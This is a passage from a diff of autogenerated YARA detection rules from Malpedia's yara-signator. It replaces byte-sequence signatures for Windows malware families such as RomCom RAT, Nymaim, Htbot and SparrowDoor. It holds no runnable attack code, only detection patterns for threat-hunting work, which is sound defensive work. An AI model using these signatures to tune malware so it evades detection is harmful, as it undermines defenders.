-		$sequence_29 = { c1e81e 33448afc 69c06589076c 03c1 89048a ff82c0090000 81bac009000070020000 }
-		$sequence_30 = { 50 8d45d8 50 8d45d4 50 8d45ec 50 }
-		$sequence_31 = { ff10 85c0 750b ff15???????? e9???????? }
-		$sequence_32 = { 56 e8???????? 8b45fc 83c40c 40 }
-		$sequence_33 = { 83f801 7513 85c9 7507 e8???????? 8bc8 890d???????? }
-		$sequence_34 = { 6a00 6800600900 6a00 ff15???????? a3???????? }
-		$sequence_35 = { e8???????? 33c0 c3 55 8bec 51 51 }
-		$sequence_36 = { 50 ff5508 8bf0 59 }
-		$sequence_37 = { 6a00 58 0f95c0 40 50 }
-		$sequence_38 = { c3 33c9 3d80000000 0f94c1 }
-		$sequence_39 = { 85c0 750c 57 ff15???????? 6afe 58 }
-		$sequence_40 = { 57 ff15???????? 33c0 85f6 0f94c0 }
-		$sequence_41 = { 6a02 ff15???????? 8bf8 83c8ff }
-		$sequence_42 = { 5e 33c0 c9 c3 55 8bec }
-		$sequence_43 = { 56 e8???????? 83c40c 8d4514 50 }
-		$sequence_44 = { e8???????? e8???????? e8???????? e8???????? e8???????? 85c0 7405 }
-		$sequence_45 = { c7871002000001000000 8bc3 eb02 33c0 }
-		$sequence_46 = { 7505 83c8ff eb51 8b0a }
-		$sequence_47 = { 8a040a 8801 48ffc1 84c0 740e 49ffc8 }
-		$sequence_48 = { c745df03000000 8975f3 c745f705000000 83780406 }
-		$sequence_49 = { e8???????? ba05000000 48898424180a0000 488d4c2420 }
-		$sequence_50 = { e8???????? 6a00 8d45d4 50 68???????? }
-		$sequence_51 = { 5d c3 33c9 66890c46 }
-		$sequence_52 = { 803c3000 75f9 5f 5e 5d c3 c6040600 }
-		$sequence_53 = { 894c245c 0f847afdffff e9???????? 31c0 8b8c2480000000 8b542450 }
-		$sequence_54 = { c7042400000000 c744240400b00300 c744240800100000 c744240c04000000 }
-		$sequence_55 = { 89442428 8b442420 8b485c 8b542418 8b32 01ce }
-		$sequence_56 = { 19ce 8a8c2495000000 80f12a 8a2d???????? 89842488000000 }
-		$sequence_57 = { 0f48c1 33c9 66894c7efe 85c0 791d }
-		$sequence_58 = { 8b85c0faffff 85c0 7407 50 ff15???????? }
-		$sequence_59 = { 8b542474 8b742440 035610 8944243c 89542438 eb55 8b442464 }
-		$sequence_60 = { 7437 8b45d0 c745c801000000 85db 741d 8d50f8 8d4f08 }
-		$sequence_61 = { 890c24 89442410 e8???????? 8b4c2414 890c24 8944240c }
-		$sequence_62 = { e9???????? 8b44246c 8b4c2468 01c8 8b942480000000 8b74247c }
-		$sequence_63 = { 8b442418 8b4c2450 8a1401 8a74243b 80cefa }
+		quality = 75
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 85c0 7408 ff15???????? eb02 }
+		$sequence_1 = { 8b01 ff761c ff7618 ff5004 }
+		$sequence_2 = { 8d45fc 50 6a01 8d45f4 50 }
+		$sequence_3 = { ff15???????? 85c0 7407 b8e3030000 }
+		$sequence_4 = { 45 33c0 48 83c9ff c744242804000000 48 }
+		$sequence_5 = { 3bc1 7604 83c8ff c3 }
+		$sequence_6 = { 56 8d45f8 50 ff15???????? 6a01 8d45f8 }
+		$sequence_7 = { 6889001200 8d45fc 50 ff15???????? }
+		$sequence_8 = { bf03000040 eb05 bf010000c0 85ff }
+		$sequence_9 = { 8d4e08 e8???????? f644240801 740c }
+		$sequence_10 = { 50 6819000200 8d45f8 50 ff15???????? 85c0 }
+		$sequence_11 = { 48 83e1f0 48 8bc1 e8???????? 48 8b05???????? }
+		$sequence_12 = { 8b4318 48 8b5328 48 8b30 48 8bce }
+		$sequence_13 = { 3b05???????? 7316 48 8d0d56560000 48 8bd3 }
 
 	condition:
-		7 of them and filesize < 4883456
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Avast_Disabler_Auto : FILE
+rule MALPEDIA_Win_Htbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6a09cca4-7cb6-5c97-b15b-4f7311a6621b"
+		id = "b8c0c702-9e98-5ca8-9fa2-097b95e54dc8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.avast_disabler_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.htbot_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "19754a7bc503b1b28bdfc059b6eb230f6f3e29b2e990d8ace51bd954a83ec439"
+		logic_hash = "39353b8760f6514deb000f072c90c3958c292efa21f940225f19c2a80bdd3000"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93958,32 +94175,32 @@ rule MALPEDIA_Win_Avast_Disabler_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7404 3bc1 7515 0f31 35???????? }
-		$sequence_1 = { 7534 837c371400 752d 89443714 6a08 8d45f4 50 }
-		$sequence_2 = { b94ee640bb 85c0 7404 3bc1 7515 }
-		$sequence_3 = { 2b4c3718 51 53 53 50 e8???????? 8b4dfc }
-		$sequence_4 = { 50 ff15???????? 6a01 8d45f8 50 ff750c ff15???????? }
-		$sequence_5 = { 33c0 40 394510 7534 837c371400 752d }
-		$sequence_6 = { 8b5c3718 83c112 03d9 837d1000 }
-		$sequence_7 = { 75a9 5f 5e 5b 5d c21000 55 }
-		$sequence_8 = { 51 803d????????00 7520 c605????????01 }
-		$sequence_9 = { 5f 5e 5b 8be5 5d c20c00 3b0d???????? }
+		$sequence_0 = { 83c6f0 3bc6 7448 837e0c00 8d7e0c 7c2c 8b10 }
+		$sequence_1 = { 33c0 5e 59 c3 51 8bc4 89642408 }
+		$sequence_2 = { 756c 8b4614 ba0c000000 f7e2 85d2 0f8719010000 7209 }
+		$sequence_3 = { 0f8412010000 83feff 7549 85db }
+		$sequence_4 = { 8d7c2418 e8???????? c684243402000000 8b44241c 83c0f0 83c40c 8d480c }
+		$sequence_5 = { 8d4c2440 89442464 e8???????? 85c0 0f8462050000 }
+		$sequence_6 = { e8???????? 83c410 837d2400 0f84c3000000 2b7508 d1fe }
+		$sequence_7 = { 50 8b4204 ffd0 8b4c2418 8b41f4 3bc3 0f841e0e0000 }
+		$sequence_8 = { b9???????? 1bc0 f7d8 83c003 8bf0 a1???????? 8b500c }
+		$sequence_9 = { 33c4 50 8d442420 64a300000000 33db 895c241c 895c2418 }
 
 	condition:
-		7 of them and filesize < 41984
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Romcom_Rat_Auto : FILE
+rule MALPEDIA_Win_Heyoka_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ac368bf9-8ebe-5cf1-b296-f1d215e57efb"
+		id = "f0f9fc3a-3361-5bee-bcdd-e0c602dd58ea"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.romcom_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.romcom_rat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heyoka"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.heyoka_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "4c8cc2f6b48e17e29a12ff93bdda011d4ae8c63471090287633ffb79d5adb21a"
+		logic_hash = "175329e4bd3a0dd34afbec31b74492ffb1225426c5eb776fbf2c975880999184"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93997,34 +94214,34 @@ rule MALPEDIA_Win_Romcom_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4e8d044580000000 33d2 498bcc e8???????? 498bc6 48ffc0 42381c28 }
-		$sequence_1 = { 8a0401 41884500 49ffc5 ffc3 41b401 488b0f 4885c9 }
-		$sequence_2 = { e8???????? 488d05d4440800 4883c328 483bd8 75e8 488b5c2430 488bc7 }
-		$sequence_3 = { 4889742410 55 488dac2440ffffff 4881ecc0010000 488b05???????? 4833c4 488985b0000000 }
-		$sequence_4 = { 66413919 75f6 4c8bc6 488d542448 488d4c2470 e8???????? }
-		$sequence_5 = { c744243810270000 89442430 488b05???????? 4889442428 488364242000 41ffd5 }
-		$sequence_6 = { 4883f81f 0f87e7140000 e8???????? 488d85e8110000 49ffc6 46382430 75f7 }
-		$sequence_7 = { 8ad9 eb0a 488b55c8 4c8b45b0 32db 41f6c410 }
-		$sequence_8 = { 4c8975b0 4c8b6de8 488b75d0 32c9 884da8 4533f6 4533e4 }
-		$sequence_9 = { 498bd4 488bcf e8???????? 33db 84c0 758b 448bfe }
+		$sequence_0 = { 8b550c 52 8b4508 50 e8???????? 83c40c 8985ecfbffff }
+		$sequence_1 = { 52 8d85dcfdffff 50 e8???????? 83c404 8d8c05ddfdffff 51 }
+		$sequence_2 = { 83c408 68???????? 8d85fcfbffff 50 e8???????? 83c408 6a0a }
+		$sequence_3 = { 6a00 8d8dd0feffff 51 8b95dcfeffff 52 }
+		$sequence_4 = { 6a0a 8d8df0f7ffff 51 8b5510 52 e8???????? }
+		$sequence_5 = { 8bec 83ec18 c745f8ffffffff c745fc01000000 6a00 }
+		$sequence_6 = { e8???????? 83c40c 8b9590d7feff 52 8b8584d7feff 50 8b8d8cd7feff }
+		$sequence_7 = { 81c1c8000000 b810270000 99 f7f9 8b55f8 8b4df0 8b949124e80000 }
+		$sequence_8 = { 8b9168d40000 81ea00000100 8b45f0 899068d40000 8b4df0 8b916cd40000 }
+		$sequence_9 = { 8b4d08 894dfc 8b55fc 83c20c 8955f4 c645e400 }
 
 	condition:
-		7 of them and filesize < 1211392
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Nymaim_Auto : FILE
+rule MALPEDIA_Win_Campoloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e0a12b6e-526a-5a8b-aed4-baed5127be87"
+		id = "00b62c88-0d38-56b9-90a5-7c85290ffbe9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nymaim_auto.yar#L1-L222"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.campoloader_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "f3d2f3296acd118f28135509a78d3821be2bc056e67d24571caf444a5d1f55ba"
+		logic_hash = "dae472a7090c99e8a9ce136356f9bc867c42c508ecb59c9f6aa0187832a15e3c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -94036,46 +94253,32 @@ rule MALPEDIA_Win_Nymaim_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89d8 01c8 31d2 f7f7 }
-		$sequence_1 = { 31d2 f7f7 92 31d2 bf64000000 }
-		$sequence_2 = { 0f94c1 09c8 6bc064 09c0 }
-		$sequence_3 = { 38f0 83d100 38d0 83d900 c1e105 }
-		$sequence_4 = { c1e105 01c8 c1c307 30c3 }
-		$sequence_5 = { c1e902 83f900 7405 01d3 }
-		$sequence_6 = { c1e902 740d 8b06 8907 83c704 }
-		$sequence_7 = { c1eb13 331d???????? 31c3 c1e808 }
-		$sequence_8 = { 31d2 bf64000000 f7f7 5b }
-		$sequence_9 = { 010d???????? 8b1d???????? 011d???????? c1eb13 }
-		$sequence_10 = { 00d3 8a16 301e 46 }
-		$sequence_11 = { c1e808 31c3 895e0c 89d8 }
-		$sequence_12 = { 8b5604 0116 8b4e08 014e04 8b5e0c 015e08 }
-		$sequence_13 = { 8b06 c1e00b 3306 8b5604 }
-		$sequence_14 = { 8b1b 4f 31c0 fec2 021c16 8a0416 }
-		$sequence_15 = { 8b12 8b4d0c 8b5d18 8b1b 4f 31c0 }
-		$sequence_16 = { 31d2 890c24 c744240400000000 8945f4 8955f0 e8???????? 8d0d8630d201 }
-		$sequence_17 = { 5b 5d c3 8b45f0 8b0c850440d201 }
-		$sequence_18 = { 56 83ec28 8b450c 8b4d08 8d154e30d201 }
-		$sequence_19 = { 31c9 8b55f4 8b75ec 89723c c7424003000000 }
-		$sequence_20 = { 83ec44 8b4508 8d0d2030d201 31d2 890c24 c744240400000000 }
-		$sequence_21 = { 55 89e5 83ec10 8b4508 8d0d3430d201 }
-		$sequence_22 = { 53 56 57 83ec44 8b4508 8d0d2030d201 }
-		$sequence_23 = { 890424 894c2404 e8???????? 8d0d3430d201 }
+		$sequence_0 = { 83ec1c a1???????? 33c5 8945fc a1???????? 8945e4 }
+		$sequence_1 = { 898d58efffff c78584efffff00000000 8d55f4 52 8b8558efffff 50 }
+		$sequence_2 = { ff15???????? ff15???????? 8b8584efffff 8b4dfc 33cd e8???????? }
+		$sequence_3 = { 8b9584efffff 039574efffff c60200 8b450c }
+		$sequence_4 = { ff15???????? 898550efffff 0fb78554efffff 50 }
+		$sequence_5 = { 038d8cefffff 898d74efffff e9???????? 8b9584efffff 039574efffff c60200 8b450c }
+		$sequence_6 = { ff15???????? 8945f8 68???????? 8b45fc 50 }
+		$sequence_7 = { 6a01 6a00 6a00 6800000040 8b4510 }
+		$sequence_8 = { 8b8558efffff 50 8d8df0feffff 51 }
+		$sequence_9 = { 8b8d70efffff 51 8b9584efffff 52 ff15???????? }
 
 	condition:
-		1 of them and filesize < 2375680
+		7 of them and filesize < 66560
 }
-rule MALPEDIA_Win_Vigilant_Cleaner_Auto : FILE
+rule MALPEDIA_Win_Zerot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "95508716-6967-5a7f-8deb-f89ef52d51c8"
+		id = "ca921115-39c5-5d82-8694-1a7256cdc82c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vigilant_cleaner_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zerot_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "8f3ebf6c4c6a27d564cc935d377873205b5347edbbb627f3304dd27f1d14c8a3"
+		logic_hash = "85e45f7b3fe13ccc106bda70bf9add1f5b39cb8a82aaafbc3111d2a319c8d43b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94089,32 +94292,32 @@ rule MALPEDIA_Win_Vigilant_Cleaner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ba58560000 ed 5b 59 5a }
-		$sequence_1 = { b90a000000 ba58560000 ed 5b }
-		$sequence_2 = { bb00000000 b90a000000 ba58560000 ed 5b }
-		$sequence_3 = { bb00000000 b90a000000 ba58560000 ed 5b 59 5a }
-		$sequence_4 = { 53 b868584d56 bb00000000 b90a000000 ba58560000 ed 5b }
-		$sequence_5 = { bb00000000 b90a000000 ba58560000 ed 5b 59 }
-		$sequence_6 = { ed 5b 59 5a }
-		$sequence_7 = { b90a000000 ba58560000 ed 5b 59 5a }
-		$sequence_8 = { b90a000000 ba58560000 ed 5b 59 }
-		$sequence_9 = { b868584d56 bb00000000 b90a000000 ba58560000 ed 5b }
+		$sequence_0 = { 8d3c1b 33c9 85ff 7e50 83c202 660f1f440000 8b460c }
+		$sequence_1 = { 8d4f01 895518 8a07 47 84c0 75f9 6800010000 }
+		$sequence_2 = { ffd6 8b8d74f6ffff 41 03c1 }
+		$sequence_3 = { 6aff 8d8554ffffff 50 6a00 6a00 }
+		$sequence_4 = { 880432 8a57fb c0e202 02d0 8b45e8 }
+		$sequence_5 = { c7458401000000 33c0 66894588 8d459c 50 }
+		$sequence_6 = { bb06000000 50 8d8594feffff 50 }
+		$sequence_7 = { 740c 81bdecf9ffffc8000000 7421 8b85e8f9ffff }
+		$sequence_8 = { 85c0 755e ff15???????? 8d857cffffff 50 ffd6 }
+		$sequence_9 = { 0f1f440000 8b460c 8a44082a 2401 88040a }
 
 	condition:
-		7 of them and filesize < 1181696
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Former_First_Rat_Auto : FILE
+rule MALPEDIA_Win_Sparrow_Door_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a1272d8c-4064-59bd-8cdc-a01b1d547c30"
+		id = "2a622c79-b97a-50d2-8520-df68de9886c5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.former_first_rat_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparrow_door"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sparrow_door_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "ce211a46152dbbb02c8c895324876bff740383a9e542511dce112b8640015613"
+		logic_hash = "9af3d65106033b3806f02bea374bf6db582af3aecda2d52e70b68fd5a5b6e2c8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94128,40 +94331,34 @@ rule MALPEDIA_Win_Former_First_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3c31 7529 8d74246c e8???????? b904000000 b8???????? 8db424f4000000 }
-		$sequence_1 = { 50 68???????? e8???????? 83c408 eb03 894608 }
-		$sequence_2 = { e8???????? 8d95f4feffff 52 8bd6 }
-		$sequence_3 = { 0f851d010000 8d8424dc010000 e8???????? 8b15???????? }
-		$sequence_4 = { 894c240c 8bd3 3bc1 7420 8d642400 8bf0 8bfa }
-		$sequence_5 = { 740c 68???????? bb06000000 eb0a 68???????? }
-		$sequence_6 = { 8944243c b8???????? 8d5001 8da42400000000 8a08 40 84c9 }
-		$sequence_7 = { be05000000 6a1c 8d4c2448 33c0 51 }
-		$sequence_8 = { 48894758 488d4754 48894760 48832100 }
-		$sequence_9 = { 498d144a 4c3bd2 7306 66418b02 eb45 }
-		$sequence_10 = { 41baffff0000 4c8b08 4d3bc8 7443 }
-		$sequence_11 = { 83e95a 0f8487000000 83e901 7425 }
-		$sequence_12 = { e8???????? 488bc3 e9???????? f6417804 }
-		$sequence_13 = { 48898424c0040000 4533f6 488bda 488bf9 493bce }
-		$sequence_14 = { 488b442440 4c8d44c009 49c1e004 4d03c5 33c0 }
-		$sequence_15 = { 4c89b424c0000000 4c89b424c8000000 488b8c24a0000000 e8???????? 90 }
+		$sequence_0 = { 50 e8???????? 33c0 8d4c242c }
+		$sequence_1 = { 51 53 57 6a40 6800100000 6800100000 6a00 }
+		$sequence_2 = { 50 8d742e08 53 e8???????? 8b442448 83c43c 85c0 }
+		$sequence_3 = { ebb3 55 e8???????? 8b44241c 83c404 50 }
+		$sequence_4 = { 89542434 8b9424e8200000 8d442449 56 33db 50 894c2444 }
+		$sequence_5 = { 8d442f08 50 e8???????? 33c0 8d4c242c }
+		$sequence_6 = { 53 6a00 6a00 ff15???????? 8b4c2418 8b542414 6a00 }
+		$sequence_7 = { 53 6a01 53 53 8d8c2498000000 }
+		$sequence_8 = { 50 889c2448020000 e8???????? 83c40c }
+		$sequence_9 = { 896c2464 e8???????? 83c43c 85c0 752e 837c242464 }
 
 	condition:
-		7 of them and filesize < 626688
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Portdoor_Auto : FILE
+rule MALPEDIA_Win_Carrotball_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f90b2eef-c6a0-58b2-8785-46346ca37f1b"
+		id = "8d1dffb9-f801-5b51-998b-8e4431af5d29"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.portdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.portdoor_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.carrotball_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "979d5d744cc74395bacd5f81861791359824c98484ee261c7c39edba432e34ef"
+		logic_hash = "8cb2e3b01c31931d0c5f23b61551aa799de8dd787a3493373f0ac01ba6f109d9"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -94173,32 +94370,32 @@ rule MALPEDIA_Win_Portdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a73 5b 6a3b 59 6a64 }
-		$sequence_1 = { 6a08 8bf1 e8???????? 8bf8 56 }
-		$sequence_2 = { ddd8 db2d???????? b801000000 833d????????00 0f8586480000 ba05000000 }
-		$sequence_3 = { 890497 42 eb1d 84ff 7405 c60000 46 }
-		$sequence_4 = { b001 eb0f 68???????? 56 e8???????? 59 59 }
-		$sequence_5 = { ff15???????? 6a02 89459c 58 ff750c 66894598 ff15???????? }
-		$sequence_6 = { 8d85fcf3ffff 57 53 50 e8???????? }
-		$sequence_7 = { e8???????? eb85 8b3d???????? 8bcf 8b1d???????? e8???????? }
-		$sequence_8 = { 83c40c 8d1406 3bcb 773f 8b7704 }
-		$sequence_9 = { eb41 8b4dec e8???????? 8945f0 eb34 8b4dec }
+		$sequence_0 = { ff15???????? eb36 68???????? 56 ff15???????? }
+		$sequence_1 = { 6a04 58 6bc000 c7807430001002000000 6a04 }
+		$sequence_2 = { 5f 8b4dfc 33cd 33c0 e8???????? 8be5 5d }
+		$sequence_3 = { ffd6 5e 5f 8b4dfc 33cd 33c0 }
+		$sequence_4 = { 68???????? ff15???????? eb36 68???????? 56 }
+		$sequence_5 = { 8bf0 85f6 0f84ac000000 68???????? }
+		$sequence_6 = { 56 ff15???????? 85c0 7432 8d85ecfdffff }
+		$sequence_7 = { ff15???????? 8bf8 85ff 0f84d9000000 56 }
+		$sequence_8 = { ff15???????? 8bf0 85f6 0f84ac000000 68???????? 56 ff15???????? }
+		$sequence_9 = { 6bc000 c7807430001002000000 6a04 58 6bc000 }
 
 	condition:
-		7 of them and filesize < 297984
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Headertip_Auto : FILE
+rule MALPEDIA_Win_Vendetta_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "106ff000-576d-5d0d-a598-b9503a4cb801"
+		id = "966ae160-05eb-53d3-b86d-ed42268f2f0c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.headertip"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.headertip_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vendetta"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vendetta_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "07b109a1a0d2271a95946a2e4133eb05992095f34ecb947954db0f3a5bf49d0e"
+		logic_hash = "4fce9b15fe513b7322e530a7cc2cb9b1afb7d5162c1238338f15db6a45fbd5fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94212,34 +94409,34 @@ rule MALPEDIA_Win_Headertip_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 e8???????? 83c40c ff7510 03f7 ffd6 85c0 }
-		$sequence_1 = { e8???????? eb2e ff75fc 53 }
-		$sequence_2 = { 68???????? 50 ff15???????? 83c410 85c0 750d }
-		$sequence_3 = { 83c40c 85ff 751c ff35???????? ff15???????? }
-		$sequence_4 = { 33c9 66894802 c3 53 }
-		$sequence_5 = { 03cb 894df8 eb3e 8b4018 }
-		$sequence_6 = { 885d10 c6452448 c6452574 c6452674 c6452770 c6452851 }
-		$sequence_7 = { 50 ff35???????? ff15???????? a3???????? 8d45b0 }
-		$sequence_8 = { ff35???????? c745fc80330000 ff15???????? 53 8d45fc 50 }
-		$sequence_9 = { 8b4114 2b410c 03c6 ebea 56 }
+		$sequence_0 = { 8b04c5e06f4100 5d c3 33c0 5d }
+		$sequence_1 = { 83c408 84c0 0f845d010000 6a00 51 0bf9 }
+		$sequence_2 = { 660f2815???????? f20f59db 660f282d???????? 660f59f5 660f28aa30914100 }
+		$sequence_3 = { 83a500fcffff00 51 8d8df8fbffff e8???????? 898500fcffff }
+		$sequence_4 = { 8b4508 dd00 ebc6 c745e0d8924100 e9???????? c745e0e0924100 }
+		$sequence_5 = { 6a30 eb27 3bcb 7f0e 7c08 81fa0000800c 7704 }
+		$sequence_6 = { 7309 8b04c5e06f4100 5d c3 33c0 5d c3 }
+		$sequence_7 = { 85c0 7433 8bce e8???????? 8bf8 }
+		$sequence_8 = { 33c9 8bc1 3914c5b89b4100 7408 40 83f81d 7cf1 }
+		$sequence_9 = { 53 8d85f0f7ffff 50 56 }
 
 	condition:
-		7 of them and filesize < 174080
+		7 of them and filesize < 296960
 }
-rule MALPEDIA_Win_Strongpity_Auto : FILE
+rule MALPEDIA_Win_Cadelspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9dea39af-3982-5a58-a948-3e1c67dd03f0"
+		id = "860c18ff-53ed-5d9c-b2bc-98b95f4d188d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.strongpity_auto.yar#L1-L178"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cadelspy_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "8a0d5e9b999ff0f85c5dc06bfd5cfa7c4f64f5270847839a9eee14c1a7cc3626"
-		score = 60
-		quality = 45
+		logic_hash = "b3c44a014ad2fbee54fda667170619e7a6ae94d19236eba6a66ccc77fd775cd1"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -94251,38 +94448,32 @@ rule MALPEDIA_Win_Strongpity_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6aff ff771c 56 ff15???????? 837df800 7416 6a04 }
-		$sequence_1 = { 53 56 ff15???????? 85c0 7427 53 }
-		$sequence_2 = { eb0f 50 56 e8???????? 59 59 }
-		$sequence_3 = { 75f8 ff75d0 68???????? ff36 e8???????? 8b45d4 }
-		$sequence_4 = { 6a6f 668945d4 58 6a6e 5a 6a74 }
-		$sequence_5 = { 7417 ba00010000 8bc8 c60100 41 83ea01 75f7 }
-		$sequence_6 = { ff75f4 68???????? 8d0441 50 e8???????? 8b4608 83c418 }
-		$sequence_7 = { 6a02 59 03c1 50 e8???????? }
-		$sequence_8 = { 5e 5d 83c40c c3 396f18 }
-		$sequence_9 = { 5e 5d 5b c3 837c240800 56 }
-		$sequence_10 = { 5e 5d 83c408 c3 33db }
-		$sequence_11 = { 5e 5d 5b 83c420 c3 8b442424 68???????? }
-		$sequence_12 = { 5e 5d 5b 83c410 c3 837c242c00 }
-		$sequence_13 = { 5e 5d 8919 33c0 5b 59 }
-		$sequence_14 = { 57 8b38 8b8f30870000 8baf28010000 }
-		$sequence_15 = { 5e 5d 8bc3 5b 83c410 c3 8b464c }
+		$sequence_0 = { e8???????? 8d842460020000 8d4802 668b10 40 40 }
+		$sequence_1 = { 83e01f c1fa05 8b1495004c0110 59 c1e006 59 }
